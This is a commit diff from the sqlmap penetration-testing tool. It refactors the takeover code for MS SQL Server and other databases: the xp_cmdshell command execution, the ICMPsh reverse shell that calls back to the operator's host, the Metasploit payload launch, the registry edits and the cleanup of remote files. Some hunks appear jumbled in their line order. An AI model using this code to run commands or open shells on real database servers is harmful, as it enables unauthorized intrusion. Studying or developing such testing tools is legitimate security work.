Minor bug fix to properly delete sqlmap temporary files on the database server file system at shutdown.

Minor improvements at ICMPsh tunnel to cleanup properly the dbms at shutdown and avoid checking/writing sys_bineval() UDF as it's a PE and needs to be called by sys_exec() only. Got rid of useless doubleslash param in delRemoteFile() method. Major code refactoring to xp_cmdshell.py methods and parent calls.
2025-05-15 21:23:46 +03:00 · 2010-10-28 00:19:40 +00:00 · 2010-10-28 00:19:40 +00:00 · 4f8e9da1b6
commit 4f8e9da1b6
parent 56c16cb471
10 changed files with 47 additions and 89 deletions
--- a/extra/icmpsh/icmpsh_m.py
+++ b/extra/icmpsh/icmpsh_m.py
@ -93,7 +93,7 @@ def main(src, dst):
                except:
                    pass
-                if cmd == 'exit':
+                if cmd == 'exit\n':
                    return
                # Set sequence number and identifier
--- a/lib/takeover/abstraction.py
+++ b/lib/takeover/abstraction.py
@ -32,7 +32,7 @@ class Abstraction(Web, UDF, xp_cmdshell):
        Web.__init__(self)
        xp_cmdshell.__init__(self)
-    def execCmd(self, cmd, silent=False, forgeCmd=False):
+    def execCmd(self, cmd, silent=False):
        if self.webBackdoorUrl and not kb.stackedTest:
            self.webBackdoorRunCmd(cmd)
@ -40,7 +40,7 @@ class Abstraction(Web, UDF, xp_cmdshell):
            self.udfExecCmd(cmd, silent=silent)
        elif kb.dbms == "Microsoft SQL Server":
-            self.xpCmdshellExecCmd(cmd, silent, forgeCmd)
+            self.xpCmdshellExecCmd(cmd, silent)
        else:
            errMsg = "Feature not yet implemented for the back-end DBMS"
@ -79,7 +79,7 @@ class Abstraction(Web, UDF, xp_cmdshell):
            else:
                dataToStdout("No output\n")
        else:
-            self.execCmd(cmd, forgeCmd=True)
+            self.execCmd(cmd)
    def shell(self):
        if self.webBackdoorUrl and not kb.stackedTest:
--- a/lib/takeover/icmpsh.py
+++ b/lib/takeover/icmpsh.py
@ -7,40 +7,21 @@ Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
 See the file 'doc/COPYING' for copying permission
 """
 import codecs
 import os
 import re
 import stat
 import sys
 import time
 from select import select
 from subprocess import PIPE
 from subprocess import Popen as execute
 from extra.icmpsh.icmpsh_m import main as icmpshmaster
 from lib.core.common import dataToStdout
 from lib.core.common import getLocalIP
 from lib.core.common import getRemoteIP
 from lib.core.common import getUnicode
 from lib.core.common import normalizePath
 from lib.core.common import ntToPosixSlashes
 from lib.core.common import pollProcess
 from lib.core.common import randomRange
 from lib.core.common import randomStr
 from lib.core.common import readInput
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
 from lib.core.data import paths
 from lib.core.exception import sqlmapDataException
 from lib.core.exception import sqlmapFilePathException
 from lib.core.subprocessng import blockingReadFromFD
 from lib.core.subprocessng import blockingWriteToFD
 from lib.core.subprocessng import setNonBlocking
 from lib.request.connect import Connect as Request
 from lib.takeover.upx import upx
 class ICMPsh:
@ -81,22 +62,18 @@ class ICMPsh:
        infoMsg  = "running icmpsh slave remotely"
        logger.info(infoMsg)
-        self.__icmpshSlaveCmd = "%s -t %s -d 500 -b 30 -s 128" % (self.__icmpslaveRemote, self.lhostStr)
+        cmd = "%s -t %s -d 500 -b 30 -s 128 &" % (self.__icmpslaveRemote, self.lhostStr)
        cmd = "%s &" % self.__icmpshSlaveCmd
        if kb.dbms == "Microsoft SQL Server" and (kb.stackedTest or conf.direct):
            cmd = self.xpCmdshellForgeCmd(cmd)
        self.execCmd(cmd, silent=True)
    def uploadIcmpshSlave(self, web=False):
        self.__randStr = randomStr(lowercase=True)
        self.__icmpslaveRemoteBase = "tmpi%s.exe" % self.__randStr
        if web:
-            self.__icmpslaveRemote = "%s/tmpi%s.exe" % (self.webDirectory, self.__randStr)
+            self.__icmpslaveRemote = "%s/%s" % (self.webDirectory, self.__icmpslaveRemoteBase)
        else:
-            self.__icmpslaveRemote = "%s/tmpi%s.exe" % (conf.tmpPath, self.__randStr)
+            self.__icmpslaveRemote = "%s/%s" % (conf.tmpPath, self.__icmpslaveRemoteBase)
        self.__icmpslaveRemote = ntToPosixSlashes(normalizePath(self.__icmpslaveRemote))
@ -115,4 +92,7 @@ class ICMPsh:
        debugMsg  = "icmpsh master exited"
        logger.debug(debugMsg)
-        self.delRemoteFile(self.__icmpslaveRemote, doubleslash=True)
+        time.sleep(1)
        self.execCmd("taskkill /F /IM %s" % self.__icmpslaveRemoteBase, silent=True)
        time.sleep(1)
        self.delRemoteFile(self.__icmpslaveRemote)
--- a/lib/takeover/metasploit.py
+++ b/lib/takeover/metasploit.py
@ -397,9 +397,6 @@ class Metasploit:
        cmd = "%s &" % self.exeFilePathRemote
        if kb.dbms == "Microsoft SQL Server" and (kb.stackedTest or conf.direct):
            cmd = self.xpCmdshellForgeCmd(cmd)
        self.execCmd(cmd, silent=True)
    def __loadMetExtensions(self, proc, metSess):
@ -648,7 +645,8 @@ class Metasploit:
        logger.debug(debugMsg)
        if not goUdf:
-            self.delRemoteFile(self.exeFilePathRemote, doubleslash=True)
+            time.sleep(1)
            self.delRemoteFile(self.exeFilePathRemote)
    def smb(self):
        self.__initVars()
--- a/lib/takeover/registry.py
+++ b/lib/takeover/registry.py
@ -87,7 +87,7 @@ class Registry:
            if index != -1:
                data = data[index + len(pattern):]
-        self.delRemoteFile(self.__batPathRemote, doubleslash=True)
+        self.delRemoteFile(self.__batPathRemote)
        return data
@ -101,8 +101,8 @@ class Registry:
        debugMsg += "to registry key '%s'" % self.__regKey
        logger.debug(debugMsg)
-        self.execCmd(cmd=self.__batPathRemote, forgeCmd=True)
+        self.execCmd(cmd=self.__batPathRemote)
-        self.delRemoteFile(self.__batPathRemote, doubleslash=True)
+        self.delRemoteFile(self.__batPathRemote)
    def delRegKey(self, regKey, regValue):
        self.__operation = "delete"
@ -114,5 +114,5 @@ class Registry:
        debugMsg += "from registry key '%s'" % self.__regKey
        logger.debug(debugMsg)
-        self.execCmd(cmd=self.__batPathRemote, forgeCmd=True)
+        self.execCmd(cmd=self.__batPathRemote)
-        self.delRemoteFile(self.__batPathRemote, doubleslash=True)
+        self.delRemoteFile(self.__batPathRemote)
--- a/lib/takeover/xp_cmdshell.py
+++ b/lib/takeover/xp_cmdshell.py
@ -36,7 +36,7 @@ class xp_cmdshell:
            cmd += "RECONFIGURE WITH OVERRIDE; "
            cmd += "EXEC master..sp_configure 'ole automation procedures', 1; "
            cmd += "RECONFIGURE WITH OVERRIDE; "
-            self.xpCmdshellExecCmd(cmd)
+            inject.goStacked(cmd)
        self.__randStr = randomStr(lowercase=True)
@ -51,7 +51,7 @@ class xp_cmdshell:
        if kb.dbmsVersion[0] in ( "2005", "2008" ):
            cmd += " RECONFIGURE WITH OVERRIDE;"
-        self.xpCmdshellExecCmd(cmd)
+        inject.goStacked(cmd)
    def __xpCmdshellConfigure2005(self, mode):
        debugMsg  = "configuring xp_cmdshell using sp_configure "
@ -85,10 +85,10 @@ class xp_cmdshell:
        else:
            cmd = self.__xpCmdshellConfigure2000(mode)
-        self.xpCmdshellExecCmd(cmd)
+        inject.goStacked(cmd)
    def __xpCmdshellCheck(self):
-        query    = self.xpCmdshellForgeCmd("ping -n %d 127.0.0.1" % (conf.timeSec * 2))
+        query = self.xpCmdshellForgeCmd("ping -n %d 127.0.0.1" % (conf.timeSec * 2))
        duration = timeUse(query)
        if duration >= conf.timeSec:
@ -102,17 +102,15 @@ class xp_cmdshell:
        return forgedCmd
-    def xpCmdshellExecCmd(self, cmd, silent=False, forgeCmd=False):
+    def xpCmdshellExecCmd(self, cmd, silent=False):
-        if forgeCmd:
+        cmd = self.xpCmdshellForgeCmd(cmd)
            cmd = self.xpCmdshellForgeCmd(cmd)
        inject.goStacked(cmd, silent)
    def xpCmdshellEvalCmd(self, cmd, first=None, last=None):
        self.getRemoteTempPath()
        tmpFile = "%s/tmpc%s.txt" % (conf.tmpPath, randomStr(lowercase=True))
-        cmd     = self.xpCmdshellForgeCmd("%s > %s" % (cmd, tmpFile))
+        cmd = "%s > %s" % (cmd, tmpFile)
        self.xpCmdshellExecCmd(cmd)
--- a/plugins/dbms/mssqlserver/filesystem.py
+++ b/plugins/dbms/mssqlserver/filesystem.py
@ -146,13 +146,10 @@ class Filesystem(GenericFilesystem):
            logger.debug("moving binary file %s to %s" % (sFile, dFile))
-            commands   = ("cd \"%s\"" % tmpPath,
+            commands = ("cd \"%s\"" % tmpPath, "ren %s %s" % (chunkName, dFileName), "move /Y %s %s" % (dFileName, dFile))
-                          "ren %s %s" % (chunkName, dFileName),
+            complComm = " & ".join(command for command in commands)
                          "move /Y %s %s" % (dFileName, dFile))
            complComm  = " & ".join(command for command in commands)
            forgedCmd  = self.xpCmdshellForgeCmd(complComm)
-            self.execCmd(forgedCmd)
+            self.execCmd(complComm)
        else:
            infoMsg  = "the %s file is bigger than %d " % (fileType, debugSize)
@ -177,13 +174,10 @@ class Filesystem(GenericFilesystem):
                infoMsg += "%s\%s to %s\%s" % (tmpPath, chunkName, tmpPath, dFileName)
                logger.debug(infoMsg)
-                commands   = ("cd %s" % tmpPath,
+                commands = ("cd %s" % tmpPath, copyCmd, "del /F %s" % chunkName)
-                               copyCmd,
+                complComm = " & ".join(command for command in commands)
                               "del /F %s" % chunkName)
                complComm  = " & ".join(command for command in commands)
                forgedCmd  = self.xpCmdshellForgeCmd(complComm)
-                self.execCmd(forgedCmd)
+                self.execCmd(complComm)
                logger.info("file chunk %d written" % counter)
@ -193,12 +187,10 @@ class Filesystem(GenericFilesystem):
            logger.debug("moving binary file %s to %s" % (sFile, dFile))
-            commands  = ("cd %s" % tmpPath,
+            commands = ("cd %s" % tmpPath, "move /Y %s %s" % (dFileName, dFile))
                         "move /Y %s %s" % (dFileName, dFile))
            complComm = " & ".join(command for command in commands)
            forgedCmd = self.xpCmdshellForgeCmd(complComm)
-            self.execCmd(forgedCmd)
+            self.execCmd(complComm)
        if confirm:
            self.askCheckWrittenFile(wFile, dFile, fileType)
--- a/plugins/generic/filesystem.py
+++ b/plugins/generic/filesystem.py
@ -205,26 +205,18 @@ class Filesystem:
            charCounter += len(forgedScrLine)
            if charCounter >= maxLen:
-                forgedCmd = self.xpCmdshellForgeCmd(cmd)
+                self.execCmd(cmd)
                self.execCmd(forgedCmd)
-                cmd         = ""
+                cmd = ""
                charCounter = 0
        if cmd:
-            forgedCmd = self.xpCmdshellForgeCmd(cmd)
+            self.execCmd(cmd)
            self.execCmd(forgedCmd)
        commands = (
                     "cd %s" % tmpPath,
                     "debug < %s" % randScr,
                     "del /F /Q %s" % randScr
                   )
        commands = ( "cd %s" % tmpPath, "debug < %s" % randScr, "del /F /Q %s" % randScr )
        complComm = " & ".join(command for command in commands)
        forgedCmd = self.xpCmdshellForgeCmd(complComm)
-        self.execCmd(forgedCmd, silent=True)
+        self.execCmd(complComm, silent=True)
        return chunkName
--- a/plugins/generic/misc.py
+++ b/plugins/generic/misc.py
@ -75,20 +75,16 @@ class Miscellaneous:
        kb.bannerFp["dbmsVersion"] = inject.getValue(query, unpack=False)
        kb.bannerFp["dbmsVersion"] = kb.bannerFp["dbmsVersion"].replace(",", "").replace("-", "").replace(" ", "")
-    def delRemoteFile(self, tempFile, doubleslash=False):
+    def delRemoteFile(self, tempFile):
        self.checkDbmsOs()
        if kb.os == "Windows":
-            if doubleslash:
+            tempFile = posixToNtSlashes(tempFile)
                tempFile = tempFile.replace("/", "\\\\")
            else:
                tempFile = posixToNtSlashes(tempFile)
            cmd = "del /F /Q %s" % tempFile
        else:
            cmd = "rm -f %s" % tempFile
-        self.execCmd(cmd, forgeCmd=True)
+        self.execCmd(cmd)
    def createSupportTbl(self, tblName, tblField, tblType):
        inject.goStacked("DROP TABLE %s" % tblName)
--- a/plugins/generic/takeover.py
+++ b/plugins/generic/takeover.py
@ -153,6 +153,8 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
                errMsg += "is unlikely to receive commands send from you"
                logger.error(errMsg)
            self.sysUdfs.pop("sys_bineval")
        if kb.stackedTest or conf.direct:
            web = False
@ -207,7 +209,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
            elif tunnel == 2:
                self.uploadIcmpshSlave(web=web)
                self.icmpPwn()
-                
+
        elif not kb.stackedTest and kb.dbms == "MySQL":
            web = True
@ -244,8 +246,8 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
            if not web or (web and self.webBackdoorUrl is not None):
                self.pwn(goUdf)
-            if not conf.cleanup:
+        if not conf.cleanup:
-                self.cleanup()
+            self.cleanup()
    def osSmb(self):
        stackedTest()